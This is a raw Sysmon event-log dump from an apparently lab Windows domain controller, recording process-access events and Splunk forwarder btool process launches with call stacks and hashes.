13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0B01-000000009101}4476C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-85E5-5FCF-0A01-000000009101}5764420C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E5-5FCF-0B01-000000009101}4476C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.690{10ACEC4A-85E5-5FCF-0B01-000000009101}4476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E5-5FCF-0A01-000000009101}576C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0A01-000000009101}576C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0A01-000000009101}576C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-85E5-5FCF-0901-000000009101}25684224C:\Windows\system32\cmd.exe{10ACEC4A-85E5-5FCF-0A01-000000009101}576C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-85E5-5FCF-0A01-000000009101}576C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E5-5FCF-0901-000000009101}2568C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0901-000000009101}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.670{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 